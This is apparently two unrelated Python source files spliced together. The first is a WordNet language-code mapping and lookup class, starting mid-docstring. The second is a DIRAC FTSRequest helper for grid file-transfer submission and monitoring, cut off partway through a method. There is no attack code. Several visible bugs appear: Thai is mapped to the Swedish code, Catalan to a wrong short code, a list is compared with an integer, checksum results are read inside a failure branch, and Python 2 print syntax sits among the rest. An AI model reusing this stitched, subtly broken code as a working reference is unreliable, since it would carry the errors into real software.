Croatian            |   hr          |   hrv
Indonesian          |   id          |   ind
Italian             |   it          |   ita
Japanese            |   ja          |   jpn
Norwegian NyNorsk   |   nn          |   nno
Norwegian Bokmål    |   nb/no       |   nob
Polish              |   pl          |   pol
Portuguese          |   pt          |   por
Slovenian           |   sl          |   slv
Spanish             |   es          |   spa
Swedish             |   sv          |   swe
Thai                |   tt          |   tha
Malay               |   ms          |   zsm
"""

"""
Language short codes => Wordnet Code
"""
AVAILABLE_LANGUAGES = dict([('sq','als'), ('ar', 'arb'), ('bg', 'bul'), ('ca', 'cat'), ('da', 'dan'), ('zh', 'cmn'),
                            ('el','ell'), ('eu', 'eus'), ('fa', 'fas'), ('fi', 'fin'), ('fr', 'fra'),
                            ('gl','glg'), ('he', 'heb'), ('hr', 'hrv'), ('id', 'ind'), ('it', 'ita'),
                            ('ja','jpn'),
                            ('nn', 'nno'), ('nb', 'nob'),
                            ('no', 'nob'), ('pl', 'pol'),
                            ('pt', 'por'),
                            ('qn','qcn'), ('sl', 'slv'), ('es', 'spa'), ('sv', 'swe'), ('tt', 'tha'),
                            ('ms', 'zsm'),
                            ('en', 'eng')])
"""
Language names => Short Code
"""
AVAILABLE_LANGUAGES_NAMES = dict([
                                ('albanian', 'sq'), ('arabic', 'ar'),('bulgarian', 'bg'), ('catalan', 'cat'), ('danish', 'da'),
                                ('chinese', 'zh'), ('basque', 'eu'), ('persian', 'fa'), ('finnish', 'fi'), ('france', 'fr'),
                                ('galician', 'gl'), ('hebrew', 'he'), ('croatian', 'hr'), ('indonesian', 'id'), ('italian', 'it'),
                                ('japanese', 'ja'), ('norwegian_nynorsk', 'nn'), ('norwegian', 'no'), ('norwegian_bokmal', 'nb'),
                                ('polish', 'pl'), ('portuguese', 'pt'), ('slovenian', 'sl'), ('spanish', 'es'),
                                ('swedish', 'sv'), ('thai', 'sv'), ('malay', 'ms'), ('english', 'en')
                                ])


class WordnetManager(object):
    def __init__(self, language="en"):
        """
        Constructor for the wordnet manager.
        It takes a main language.
        """
        self.__language = language

    def __isLanguageAvailable(self, code=None, language_name=None):
        """
        Check if a language is available
        """
        if code is None and language_name is None:
            raise Exception("Error evaluating the correct language")

        if code is not None and code.lower() in AVAILABLE_LANGUAGES:

            return True

        if language_name is not None and language_name.lower() in AVAILABLE_LANGUAGES_NAMES:
            return True

        return False

    def __nameToWordnetCode(self, name):
        """
        It returns the wordnet code for a given language name
        """
        if not self.__isLanguageAvailable(language_name=name):
            raise Exception("Wordnet code not found for the language name %s " % name)
        name = name.lower()
        languageShortCode = AVAILABLE_LANGUAGES_NAMES[name]

        wordnetCode = self.__shortCodeToWordnetCode(code=languageShortCode)
        return wordnetCode

    def __shortCodeToWordnetCode(self, shortCode):
        """
        It returns the wordnet code from a given language short code
        """
        if not self.__isLanguageAvailable(code=shortCode):
            raise Exception("Wordnet code not found for the language short code %s " % shortCode)

        code = shortCode.lower()
        wordnetCode = AVAILABLE_LANGUAGES[code]
        return wordnetCode

    def __getSynsets(self, word, wordNetCode):
        """
        It returns the synsets given both word and language code
        """
        from nltk.corpus import wordnet as wn

        synsets = wn.synsets(word, lang=wordNetCode)
        return synsets

    def getLemmas(self, word, languageCode="en"):
        """
        Get the lemmas for a given word
        :word: The word
        :languageCode: The language for a given lemma
        """
        wnCode = self.__shortCodeToWordnetCode(shortCode=languageCode)
        synsets = self.__getSynsets(word, wnCode) #wn.synsets(word, lang=wnCode)
        lemmas = dict([('en', [])])

        for synset in synsets:
            enLemmas = synset.lemma_names()
            lemmas['en'].extend(enLemmas)

            if languageCode != "en" and self.__isLanguageAvailable(code=languageCode):
                langLemmas = list(sorted(set(synset.lemma_names(lang=wnCode))))
                lemmas[languageCode] = langLemmas
        lemmas['en'] = list(sorted(set(lemmas.get('en', []))))
        return lemmas

    def getSynonyms(self, words=[], language_code="en"):
        """
        Get the synonyms from a list of words.
        :words: A list of words
        :language_code: the language for the synonyms.
        """
        if words is None or not isinstance(words, list) or list(words) <= 0:
            return []

        if not self.__isLanguageAvailable(code=language_code):
            return []

        wnCode = self.__shortCodeToWordnetCode(language_code)
        result = {}
        for word in words:
            result[word] = dict([('lemmas', self.getLemmas(word,languageCode=language_code))])
        return result

    def getHyponyms(self, words, language_code="en"):
        """
        Get specific synsets from a given synset
        """
        wnCode = self.__shortCodeToWordnetCode(language_code)
        result = {}
        for word in words:
            synonyms = self.__getSynsets(word, wnCode)
            hyponyms = [hyp for synset in synonyms for hyp in synset.hyponyms()]
            engLemmas = [hyp.lemma_names() for hyp in  hyponyms]
            lemmas = dict([('en', list(sorted(set(itertools.chain.from_iterable(engLemmas)), key=lambda s: s.lower())))])
            if language_code != "en":
                languageLemmas = [hyp.lemma_names(lang=wnCode) for hyp in  hyponyms]
                languageLemmas = list(sorted(set(itertools.chain.from_iterable(languageLemmas)), key=lambda s: s.lower()))
                lemmas[language_code] = languageLemmas

            result[word] = dict([ ('lemmas', lemmas), ('language', language_code)])

        return result

    def getHypernyms(self, words, language_code="en"):
        """
        Get general synsets from a given synset
        """
        wnCode = self.__shortCodeToWordnetCode(language_code)
        result = {}
        for word in words:
            synonyms = self.__getSynsets(word, wnCode)
            hypernyms = [hyp for synset in synonyms for hyp in synset.hypernyms()]
            engLemmas = [hyp.lemma_names() for hyp in  hypernyms]
            lemmas = dict([('en', list(sorted(set(itertools.chain.from_iterable(engLemmas)), key=lambda s: s.lower())))])
            if language_code != "en":
                languageLemmas = [hyp.lemma_names(lang=wnCode) for hyp in  hypernyms]
                languageLemmas = list(sorted(set(itertools.chain.from_iterable(languageLemmas)), key=lambda s: s.lower()))
                lemmas[language_code] = languageLemmas

            result[word] = dict([ ('lemmas', lemmas), ('language', language_code)])

        return result

#############################################################################
# $HeadURL$
#############################################################################
""" ..mod: FTSRequest
    =================

    Helper class to perform FTS job submission and monitoring.

"""
# # imports
import sys
import re
import time
# # from DIRAC
from DIRAC import gLogger, S_OK, S_ERROR
from DIRAC.Core.Utilities.File import checkGuid
from DIRAC.Core.Utilities.Adler import compareAdler, intAdlerToHex, hexAdlerToInt
from DIRAC.Core.Utilities.SiteSEMapping import getSitesForSE
from DIRAC.Core.Utilities.Time import dateTime
from DIRAC.Resources.Storage.StorageElement import StorageElement
from DIRAC.Resources.Catalog.FileCatalog    import FileCatalog
from DIRAC.Core.Utilities.ReturnValues import returnSingleResult

from DIRAC.AccountingSystem.Client.Types.DataOperation import DataOperation
from DIRAC.ConfigurationSystem.Client.Helpers.Resources import Resources
from DIRAC.Core.Security.ProxyInfo import getProxyInfo
from DIRAC.ConfigurationSystem.Client.Helpers.Operations import Operations

from DIRAC.DataManagementSystem.Client.FTSJob import FTSJob
from DIRAC.DataManagementSystem.Client.FTSFile import FTSFile

# # RCSID
__RCSID__ = "$Id$"

class FTSRequest( object ):
  """
  .. class:: FTSRequest

  Helper class for FTS job submission and monitoring.
  """

  # # default checksum type
  __defaultCksmType = "ADLER32"
  # # flag to disablr/enable checksum test, default: disabled
  __cksmTest = False

  def __init__( self ):
    """c'tor

    :param self: self reference
    """
    self.log = gLogger.getSubLogger( self.__class__.__name__, True )

    # # final states tuple
    self.finalStates = ( 'Canceled', 'Failed', 'Hold',
                         'Finished', 'FinishedDirty' )
    # # failed states tuple
    self.failedStates = ( 'Canceled', 'Failed',
                          'Hold', 'FinishedDirty' )
    # # successful states tuple
    self.successfulStates = ( 'Finished', 'Done' )
    # # all file states tuple
    self.fileStates = ( 'Done', 'Active', 'Pending', 'Ready', 'Canceled', 'Failed',
                        'Finishing', 'Finished', 'Submitted', 'Hold', 'Waiting' )

    self.statusSummary = {}

    # # request status
    self.requestStatus = 'Unknown'

    # # dict for FTS job files
    self.fileDict = {}
    # # dict for replicas information
    self.catalogReplicas = {}
    # # dict for metadata information
    self.catalogMetadata = {}
    # # dict for files that failed to register
    self.failedRegistrations = {}

    # # placehoder for FileCatalog reference
    self.oCatalog = None

    # # submit timestamp
    self.submitTime = ''

    # # placeholder FTS job GUID
    self.ftsGUID = ''
    # # placeholder for FTS server URL
    self.ftsServer = ''

    # # flag marking FTS job completness
    self.isTerminal = False
    # # completness percentage
    self.percentageComplete = 0.0

    # # source SE name
    self.sourceSE = ''
    # # flag marking source SE validity
    self.sourceValid = False
    # # source space token
    self.sourceToken = ''

    # # target SE name
    self.targetSE = ''
    # # flag marking target SE validity
    self.targetValid = False
    # # target space token
    self.targetToken = ''

    # # placeholder for target StorageElement
    self.oTargetSE = None
    # # placeholder for source StorageElement
    self.oSourceSE = None

    # # checksum type, set it to default
    self.__cksmType = self.__defaultCksmType
    # # disable checksum test by default
    self.__cksmTest = False

    # # statuses that prevent submitting to FTS
    self.noSubmitStatus = ( 'Failed', 'Done', 'Staging' )

    # # were sources resolved?
    self.sourceResolved = False

    # # Number of file transfers actually submitted
    self.submittedFiles = 0
    self.transferTime = 0

    self.submitCommand = Operations().getValue( 'DataManagement/FTSPlacement/FTS2/SubmitCommand', 'glite-transfer-submit' )
    self.monitorCommand = Operations().getValue( 'DataManagement/FTSPlacement/FTS2/MonitorCommand', 'glite-transfer-status' )
    self.ftsJob = None
    self.ftsFiles = []

  ####################################################################
  #
  #  Methods for setting/getting/checking the SEs
  #

  def setSourceSE( self, se ):
    """ set SE for source

    :param self: self reference
    :param str se: source SE name
    """
    if se == self.targetSE:
      return S_ERROR( "SourceSE is TargetSE" )
    self.sourceSE = se
    self.oSourceSE = StorageElement( self.sourceSE )
    return self.__checkSourceSE()

  def __checkSourceSE( self ):
    """ check source SE availability

    :param self: self reference
    """
    if not self.sourceSE:
      return S_ERROR( "SourceSE not set" )
    res = self.oSourceSE.isValid( 'Read' )
    if not res['OK']:
      return S_ERROR( "SourceSE not available for reading" )
    res = self.__getSESpaceToken( self.oSourceSE )
    if not res['OK']:
      self.log.error( "FTSRequest failed to get SRM Space Token for SourceSE", res['Message'] )
      return S_ERROR( "SourceSE does not support FTS transfers" )

    if self.__cksmTest:
      res = self.oSourceSE.getChecksumType()
      if not res["OK"]:
        self.log.error( "Unable to get checksum type for SourceSE", 
                        "%s: %s" % ( self.sourceSE, res["Message"] ) )
        cksmType = res["Value"]
        if cksmType in ( "NONE", "NULL" ):
          self.log.warn( "Checksum type set to %s at SourceSE %s, disabling checksum test" % ( cksmType,
                                                                                              self.sourceSE ) )
          self.__cksmTest = False
        elif cksmType != self.__cksmType:
          self.log.warn( "Checksum type mismatch, disabling checksum test" )
          self.__cksmTest = False

    self.sourceToken = res['Value']
    self.sourceValid = True
    return S_OK()

  def setTargetSE( self, se ):
    """ set target SE

    :param self: self reference
    :param str se: target SE name
    """
    if se == self.sourceSE:
      return S_ERROR( "TargetSE is SourceSE" )
    self.targetSE = se
    self.oTargetSE = StorageElement( self.targetSE )
    return self.__checkTargetSE()

  def setTargetToken( self, token ):
    """ target space token setter

    :param self: self reference
    :param str token: target space token
    """
    self.targetToken = token
    return S_OK()

  def __checkTargetSE( self ):
    """ check target SE availability

    :param self: self reference
    """
    if not self.targetSE:
      return S_ERROR( "TargetSE not set" )
    res = self.oTargetSE.isValid( 'Write' )
    if not res['OK']:
      return S_ERROR( "TargetSE not available for writing" )
    res = self.__getSESpaceToken( self.oTargetSE )
    if not res['OK']:
      self.log.error( "FTSRequest failed to get SRM Space Token for TargetSE", res['Message'] )
      return S_ERROR( "TargetSE does not support FTS transfers" )

    # # check checksum types
    if self.__cksmTest:
      res = self.oTargetSE.getChecksumType()
      if not res["OK"]:
        self.log.error( "Unable to get checksum type for TargetSE", 
                        "%s: %s" % ( self.targetSE, res["Message"] ) )
        cksmType = res["Value"]
        if cksmType in ( "NONE", "NULL" ):
          self.log.warn( "Checksum type set to %s at TargetSE %s, disabling checksum test" % ( cksmType,
                                                                                              self.targetSE ) )
          self.__cksmTest = False
        elif cksmType != self.__cksmType:
          self.log.warn( "Checksum type mismatch, disabling checksum test" )
          self.__cksmTest = False

    self.targetToken = res['Value']
    self.targetValid = True
    return S_OK()

  @staticmethod
  def __getSESpaceToken( oSE ):
    """ get space token from StorageElement instance

    :param self: self reference
    :param StorageElement oSE: StorageElement instance
    """
    res = oSE.getStorageParameters( "SRM2" )
    if not res['OK']:
      return res
    return S_OK( res['Value'].get( 'SpaceToken' ) )

  ####################################################################
  #
  #  Methods for setting/getting FTS request parameters
  #

  def setFTSGUID( self, guid ):
    """ FTS job GUID setter

    :param self: self reference
    :param str guid: string containg GUID
    """
    if not checkGuid( guid ):
      return S_ERROR( "Incorrect GUID format" )
    self.ftsGUID = guid
    return S_OK()


  def setFTSServer( self, server ):
    """ FTS server setter

    :param self: self reference
    :param str server: FTS server URL
    """
    self.ftsServer = server
    return S_OK()

  def isRequestTerminal( self ):
    """ check if FTS job has terminated

    :param self: self reference
    """
    if self.requestStatus in self.finalStates:
      self.isTerminal = True
    return S_OK( self.isTerminal )

  def setCksmTest( self, cksmTest = False ):
    """ set cksm test

    :param self: self reference
    :param bool cksmTest: flag to enable/disable checksum test
    """
    self.__cksmTest = bool( cksmTest )
    return S_OK( self.__cksmTest )

  ####################################################################
  #
  #  Methods for setting/getting/checking files and their metadata
  #

  def setLFN( self, lfn ):
    """ add LFN :lfn: to :fileDict:

    :param self: self reference
    :param str lfn: LFN to add to
    """
    self.fileDict.setdefault( lfn, {'Status':'Waiting'} )
    return S_OK()

  def setSourceSURL( self, lfn, surl ):
    """ source SURL setter

    :param self: self reference
    :param str lfn: LFN
    :param str surl: source SURL
    """
    target = self.fileDict[lfn].get( 'Target' )
    if target == surl:
      return S_ERROR( "Source and target the same" )
    return self.__setFileParameter( lfn, 'Source', surl )

  def getSourceSURL( self, lfn ):
    """ get source SURL for LFN :lfn:

    :param self: self reference
    :param str lfn: LFN
    """
    return self.__getFileParameter( lfn, 'Source' )

  def setTargetSURL( self, lfn, surl ):
    """ set target SURL for LFN :lfn:

    :param self: self reference
    :param str lfn: LFN
    :param str surl: target SURL
    """
    source = self.fileDict[lfn].get( 'Source' )
    if source == surl:
      return S_ERROR( "Source and target the same" )
    return self.__setFileParameter( lfn, 'Target', surl )

  def getFailReason( self, lfn ):
    """ get fail reason for file :lfn:

    :param self: self reference
    :param str lfn: LFN
    """
    return self.__getFileParameter( lfn, 'Reason' )

  def getRetries( self, lfn ):
    """ get number of attepmts made to transfer file :lfn:

    :param self: self reference
    :param str lfn: LFN
    """
    return self.__getFileParameter( lfn, 'Retries' )

  def getTransferTime( self, lfn ):
    """ get duration of transfer for file :lfn:

    :param self: self reference
    :param str lfn: LFN
    """
    return self.__getFileParameter( lfn, 'Duration' )

  def getFailed( self ):
    """ get list of wrongly transferred LFNs

    :param self: self reference
    """
    return S_OK( [ lfn for lfn in self.fileDict
                   if self.fileDict[lfn].get( 'Status', '' ) in self.failedStates ] )

  def getStaging( self ):
    """ get files set for prestaging """
    return S_OK( [lfn for lfn in self.fileDict
                  if self.fileDict[lfn].get( 'Status', '' ) == 'Staging'] )

  def getDone( self ):
    """ get list of succesfully transferred LFNs

    :param self: self reference
    """
    return S_OK( [ lfn for lfn in self.fileDict
                   if self.fileDict[lfn].get( 'Status', '' ) in self.successfulStates ] )

  def __setFileParameter( self, lfn, paramName, paramValue ):
    """ set :paramName: to :paramValue: for :lfn: file

    :param self: self reference
    :param str lfn: LFN
    :param str paramName: parameter name
    :param mixed paramValue: a new parameter value
    """
    self.setLFN( lfn )
    self.fileDict[lfn][paramName] = paramValue
    return S_OK()

  def __getFileParameter( self, lfn, paramName ):
    """ get value of :paramName: for file :lfn:

    :param self: self reference
    :param str lfn: LFN
    :param str paramName: parameter name
    """
    if lfn not in self.fileDict:
      return S_ERROR( "Supplied file not set" )
    if paramName not in self.fileDict[lfn]:
      return S_ERROR( "%s not set for file" % paramName )
    return S_OK( self.fileDict[lfn][paramName] )

  ####################################################################
  #
  #  Methods for submission
  #

  def submit( self, monitor = False, printOutput = True ):
    """ submit FTS job

    :param self: self reference
    :param bool monitor: flag to monitor progress of FTS job
    :param bool printOutput: flag to print output of execution to stdout
    """
    res = self.__prepareForSubmission()
    if not res['OK']:
      return res
    res = self.__submitFTSTransfer()
    if not res['OK']:
      return res
    resDict = { 'ftsGUID' : self.ftsGUID, 'ftsServer' : self.ftsServer, 'submittedFiles' : self.submittedFiles }
    if monitor or printOutput:
      gLogger.always( "Submitted %s@%s" % ( self.ftsGUID, self.ftsServer ) )
      if monitor:
        self.monitor( untilTerminal = True, printOutput = printOutput, full = False )
    return S_OK( resDict )

  def __prepareForSubmission( self ):
    """ check validity of job before submission

    :param self: self reference
    """
    if not self.fileDict:
      return S_ERROR( "No files set" )
    if not self.sourceValid:
      return S_ERROR( "SourceSE not valid" )
    if not self.targetValid:
      return S_ERROR( "TargetSE not valid" )
    if not self.ftsServer:
      res = self.__resolveFTSServer()
      if not res['OK']:
        return S_ERROR( "FTSServer not valid" )
    self.resolveSource()
    self.resolveTarget()
    res = self.__filesToSubmit()
    if not res['OK']:
      return S_ERROR( "No files to submit" )
    return S_OK()

  def __getCatalogObject( self ):
    """ CatalogInterface instance facade

    :param self: self reference
    """
    try:
      if not self.oCatalog:
        self.oCatalog = FileCatalog()
      return S_OK()
    except:
      return S_ERROR()

  def __updateReplicaCache( self, lfns = None, overwrite = False ):
    """ update replica cache for list of :lfns:

    :param self: self reference
    :param mixed lfns: list of LFNs
    :param bool overwrite: flag to trigger cache clearing and updating
    """
    if not lfns:
      lfns = self.fileDict.keys()
    toUpdate = [ lfn for lfn in lfns if ( lfn not in self.catalogReplicas ) or overwrite ]
    if not toUpdate:
      return S_OK()
    res = self.__getCatalogObject()
    if not res['OK']:
      return res
    res = self.oCatalog.getReplicas( toUpdate )
    if not res['OK']:
      return S_ERROR( "Failed to update replica cache: %s" % res['Message'] )
    for lfn, error in res['Value']['Failed'].items():
      self.__setFileParameter( lfn, 'Reason', error )
      self.__setFileParameter( lfn, 'Status', 'Failed' )
    for lfn, replicas in res['Value']['Successful'].items():
      self.catalogReplicas[lfn] = replicas
    return S_OK()

  def __updateMetadataCache( self, lfns = None ):
    """ update metadata cache for list of LFNs

    :param self: self reference
    :param list lnfs: list of LFNs
    """
    if not lfns:
      lfns = self.fileDict.keys()
    toUpdate = [ lfn for lfn in lfns if lfn not in self.catalogMetadata ]
    if not toUpdate:
      return S_OK()
    res = self.__getCatalogObject()
    if not res['OK']:
      return res
    res = self.oCatalog.getFileMetadata( toUpdate )
    if not res['OK']:
      return S_ERROR( "Failed to get source catalog metadata: %s" % res['Message'] )
    for lfn, error in res['Value']['Failed'].items():
      self.__setFileParameter( lfn, 'Reason', error )
      self.__setFileParameter( lfn, 'Status', 'Failed' )
    for lfn, metadata in res['Value']['Successful'].items():
      self.catalogMetadata[lfn] = metadata
    return S_OK()

  def resolveSource( self ):
    """ resolve source SE eligible for submission

    :param self: self reference
    """

    # Avoid resolving sources twice
    if self.sourceResolved:
      return S_OK()
    # Only resolve files that need a transfer
    toResolve = [ lfn for lfn in self.fileDict if self.fileDict[lfn].get( "Status", "" ) != "Failed" ]
    if not toResolve:
      return S_OK()
    res = self.__updateMetadataCache( toResolve )
    if not res['OK']:
      return res
    res = self.__updateReplicaCache( toResolve )
    if not res['OK']:
      return res

    # Define the source URLs
    for lfn in toResolve:
      replicas = self.catalogReplicas.get( lfn, {} )
      if self.sourceSE not in replicas:
        gLogger.warn( "resolveSource: skipping %s - not replicas at SourceSE %s" % ( lfn, self.sourceSE ) )
        self.__setFileParameter( lfn, 'Reason', "No replica at SourceSE" )
        self.__setFileParameter( lfn, 'Status', 'Failed' )
        continue

      res = returnSingleResult( self.oSourceSE.getURL( lfn, protocol = 'srm' ) )
      if not res['OK']:
        gLogger.warn( "resolveSource: skipping %s - %s" % ( lfn, res["Message"] ) )
        self.__setFileParameter( lfn, 'Reason', res['Message'] )
        self.__setFileParameter( lfn, 'Status', 'Failed' )
        continue
      res = self.setSourceSURL( lfn, res['Value'] )
      if not res['OK']:
        gLogger.warn( "resolveSource: skipping %s - %s" % ( lfn, res["Message"] ) )
        self.__setFileParameter( lfn, 'Reason', res['Message'] )
        self.__setFileParameter( lfn, 'Status', 'Failed' )
        continue

    toResolve = []
    for lfn in self.fileDict:
      if "Source" in self.fileDict[lfn]:
        toResolve.append( lfn )
    if not toResolve:
      return S_ERROR( "No eligible Source files" )

    # Get metadata of the sources, to check for existance, availability and caching
    res = self.oSourceSE.getFileMetadata( toResolve )
    if not res['OK']:
      return S_ERROR( "Failed to check source file metadata" )

    for lfn, error in res['Value']['Failed'].items():
      if re.search( 'File does not exist', error ):
        gLogger.warn( "resolveSource: skipping %s - source file does not exists" % lfn )
        self.__setFileParameter( lfn, 'Reason', "Source file does not exist" )
        self.__setFileParameter( lfn, 'Status', 'Failed' )
      else:
        gLogger.warn( "resolveSource: skipping %s - failed to get source metadata" % lfn )
        self.__setFileParameter( lfn, 'Reason', "Failed to get Source metadata" )
        self.__setFileParameter( lfn, 'Status', 'Failed' )
    toStage = []

    nbStagedFiles = 0
    for lfn, metadata in res['Value']['Successful'].items():
      lfnStatus = self.fileDict.get( lfn, {} ).get( 'Status' )
      if metadata['Unavailable']:
        gLogger.warn( "resolveSource: skipping %s - source file unavailable" % lfn )
        self.__setFileParameter( lfn, 'Reason', "Source file Unavailable" )
        self.__setFileParameter( lfn, 'Status', 'Failed' )
      elif metadata['Lost']:
        gLogger.warn( "resolveSource: skipping %s - source file lost" % lfn )
        self.__setFileParameter( lfn, 'Reason', "Source file Lost" )
        self.__setFileParameter( lfn, 'Status', 'Failed' )
      elif not metadata['Cached']:
        if lfnStatus != 'Staging':
          toStage.append( lfn )
      elif metadata['Size'] != self.catalogMetadata[lfn]['Size']:
        gLogger.warn( "resolveSource: skipping %s - source file size mismatch" % lfn )
        self.__setFileParameter( lfn, 'Reason', "Source size mismatch" )
        self.__setFileParameter( lfn, 'Status', 'Failed' )
      elif self.catalogMetadata[lfn]['Checksum'] and metadata['Checksum'] and \
            not compareAdler( metadata['Checksum'], self.catalogMetadata[lfn]['Checksum'] ):
        gLogger.warn( "resolveSource: skipping %s - source file checksum mismatch" % lfn )
        self.__setFileParameter( lfn, 'Reason', "Source checksum mismatch" )
        self.__setFileParameter( lfn, 'Status', 'Failed' )
      elif lfnStatus == 'Staging':
        # file that was staging is now cached
        self.__setFileParameter( lfn, 'Status', 'Waiting' )
        nbStagedFiles += 1

    # Some files were being staged
    if nbStagedFiles:
      self.log.info( 'resolveSource: %d files have been staged' % nbStagedFiles )

    # Launching staging of files not in cache
    if toStage:
      gLogger.warn( "resolveSource: %s source files not cached, prestaging..." % len( toStage ) )
      stage = self.oSourceSE.prestageFile( toStage )
      if not stage["OK"]:
        gLogger.error( "resolveSource: error is prestaging", stage["Message"] )
        for lfn in toStage:
          self.__setFileParameter( lfn, 'Reason', stage["Message"] )
          self.__setFileParameter( lfn, 'Status', 'Failed' )
      else:
        for lfn in toStage:
          if lfn in stage['Value']['Successful']:
            self.__setFileParameter( lfn, 'Status', 'Staging' )
          elif lfn in stage['Value']['Failed']:
            self.__setFileParameter( lfn, 'Reason', stage['Value']['Failed'][lfn] )
            self.__setFileParameter( lfn, 'Status', 'Failed' )

    self.sourceResolved = True
    return S_OK()

  def resolveTarget( self ):
    """ find target SE eligible for submission

    :param self: self reference
    """
    toResolve = [ lfn for lfn in self.fileDict
                 if self.fileDict[lfn].get( 'Status' ) not in self.noSubmitStatus ]
    if not toResolve:
      return S_OK()
    res = self.__updateReplicaCache( toResolve )
    if not res['OK']:
      return res
    for lfn in toResolve:
      res = returnSingleResult( self.oTargetSE.getURL( lfn, protocol = 'srm' ) )
      if not res['OK']:
        reason = res.get( 'Message', res['Message'] )
        gLogger.warn( "resolveTarget: skipping %s - %s" % ( lfn, reason ) )
        self.__setFileParameter( lfn, 'Reason', reason )
        self.__setFileParameter( lfn, 'Status', 'Failed' )
        continue

      res = self.setTargetSURL( lfn, res['Value'] )
      if not res['OK']:
        gLogger.warn( "resolveTarget: skipping %s - %s" % ( lfn, res["Message"] ) )
        self.__setFileParameter( lfn, 'Reason', res['Message'] )
        self.__setFileParameter( lfn, 'Status', 'Failed' )
        continue
    toResolve = []
    for lfn in self.fileDict:
      if "Target" in self.fileDict[lfn]:
        toResolve.append( lfn )
    if not toResolve:
      return S_ERROR( "No eligible Target files" )
    res = self.oTargetSE.exists( toResolve )
    if not res['OK']:
      return S_ERROR( "Failed to check target existence" )
    for lfn, error in res['Value']['Failed'].items():
      self.__setFileParameter( lfn, 'Reason', error )
      self.__setFileParameter( lfn, 'Status', 'Failed' )
    toRemove = []
    for lfn, exists in res['Value']['Successful'].items():
      if exists:
        res = self.getSourceSURL( lfn )
        if not res['OK']:
          gLogger.warn( "resolveTarget: skipping %s - target exists" % lfn )
          self.__setFileParameter( lfn, 'Reason', "Target exists" )
          self.__setFileParameter( lfn, 'Status', 'Failed' )
        elif res['Value'] == self.fileDict[lfn]['Target']:
          gLogger.warn( "resolveTarget: skipping %s - source and target pfns are the same" % lfn )
          self.__setFileParameter( lfn, 'Reason', "Source and Target the same" )
          self.__setFileParameter( lfn, 'Status', 'Failed' )
        else:
          toRemove.append( lfn )
    if toRemove:
      self.oTargetSE.removeFile( toRemove )
    return S_OK()

  def __filesToSubmit( self ):
    """
    check if there is at least one file to submit

    :return: S_OK if at least one file is present, S_ERROR otherwise
    """
    for lfn in self.fileDict:
      lfnStatus = self.fileDict[lfn].get( 'Status' )
      source = self.fileDict[lfn].get( 'Source' )
      target = self.fileDict[lfn].get( 'Target' )
      if lfnStatus not in self.noSubmitStatus and source and target:
        return S_OK()
    return S_ERROR()

  def __createFTSFiles( self ):
    """ create LFNs file for glite-transfer-submit command

    This file consists one line for each fiel to be transferred:

    sourceSURL targetSURL [CHECKSUMTYPE:CHECKSUM]

    :param self: self reference
    """
    self.__updateMetadataCache()
    for lfn in self.fileDict:
      lfnStatus = self.fileDict[lfn].get( 'Status' )
      if lfnStatus not in self.noSubmitStatus:
        cksmStr = ""
        # # add chsmType:cksm only if cksmType is specified, else let FTS decide by itself
        if self.__cksmTest and self.__cksmType:
          checkSum = self.catalogMetadata.get( lfn, {} ).get( 'Checksum' )
          if checkSum:
            cksmStr = " %s:%s" % ( self.__cksmType, intAdlerToHex( hexAdlerToInt( checkSum ) ) )
        ftsFile = FTSFile()
        ftsFile.LFN = lfn
        ftsFile.SourceSURL = self.fileDict[lfn].get( 'Source' )
        ftsFile.TargetSURL = self.fileDict[lfn].get( 'Target' )
        ftsFile.SourceSE = self.sourceSE
        ftsFile.TargetSE = self.targetSE
        ftsFile.Status = self.fileDict[lfn].get( 'Status' )
        ftsFile.Checksum = cksmStr
        ftsFile.Size = self.catalogMetadata.get( lfn, {} ).get( 'Size' )
        self.ftsFiles.append( ftsFile )
        self.submittedFiles += 1
    return S_OK()

  def __createFTSJob( self, guid = None ):
    self.__createFTSFiles()
    ftsJob = FTSJob()
    ftsJob.RequestID = 0
    ftsJob.OperationID = 0
    ftsJob.SourceSE = self.sourceSE
    ftsJob.TargetSE = self.targetSE
    ftsJob.SourceToken = self.sourceToken
    ftsJob.TargetToken = self.targetToken
    ftsJob.FTSServer = self.ftsServer
    if guid:
      ftsJob.FTSGUID = guid

    for ftsFile in self.ftsFiles:
      ftsFile.Attempt += 1
      ftsFile.Error = ""
      ftsJob.addFile( ftsFile )
    self.ftsJob = ftsJob

  def __submitFTSTransfer( self ):
    """ create and execute glite-transfer-submit CLI command

    :param self: self reference
    """
    log = gLogger.getSubLogger( 'Submit' )
    self.__createFTSJob()

    submit = self.ftsJob.submitFTS2( command = self.submitCommand )
    if not submit["OK"]:
      log.error( "unable to submit FTSJob: %s" % submit["Message"] )
      return submit

    log.info( "FTSJob '%s'@'%s' has been submitted" % ( self.ftsJob.FTSGUID, self.ftsJob.FTSServer ) )

    # # update statuses for job files
    for ftsFile in self.ftsJob:
      ftsFile.FTSGUID = self.ftsJob.FTSGUID
      ftsFile.Status = "Submitted"
      ftsFile.Attempt += 1

    log.info( "FTSJob '%s'@'%s' has been submitted" % ( self.ftsJob.FTSGUID, self.ftsJob.FTSServer ) )
    self.ftsGUID = self.ftsJob.FTSGUID
    return S_OK()

  def __resolveFTSServer( self ):
    """
    resolve FTS server to use, it should be the closest one from target SE

    :param self: self reference
    """
    from DIRAC.ConfigurationSystem.Client.Helpers.Resources import getFTSServersForSites
    if not self.targetSE:
      return S_ERROR( "Target SE not set" )
    res = getSitesForSE( self.targetSE )
    if not res['OK'] or not res['Value']:
      return S_ERROR( "Could not determine target site" )
    targetSites = res['Value']

    targetSite = ''
    for targetSite in targetSites:
      targetFTS = getFTSServersForSites( [targetSite] )
      if targetFTS['OK']:
        ftsTarget = targetFTS['Value'][targetSite]
        if ftsTarget:
          self.ftsServer = ftsTarget
          return S_OK( self.ftsServer )
      else:
        return targetFTS
    return S_ERROR( 'No FTS server found for %s' % targetSite )

  ####################################################################
  #
  #  Methods for monitoring
  #

  def summary( self, untilTerminal = False, printOutput = False ):
    """ summary of FTS job

    :param self: self reference
    :param bool untilTerminal: flag to monitor FTS job to its final state
    :param bool printOutput: flag to print out monitoring information to the stdout
    """
    res = self.__isSummaryValid()
    if not res['OK']:
      return res
    while not self.isTerminal:
      res = self.__parseOutput( full = True )
      if not res['OK']:
        return res
      if untilTerminal:
        self.__print()
      self.isRequestTerminal()
      if res['Value'] or ( not untilTerminal ):
        break
      time.sleep( 1 )
    if untilTerminal:
      print ""
    if printOutput and ( not untilTerminal ):
      return self.dumpSummary( printOutput = printOutput )
    return S_OK()

  def monitor( self, untilTerminal = False, printOutput = False, full = True ):
    """ monitor FTS job

    :param self: self reference
    :param bool untilTerminal: flag to monitor FTS job to its final state
    :param bool printOutput: flag to print out monitoring information to the stdout
    """
    if not self.ftsJob:
      self.resolveSource()
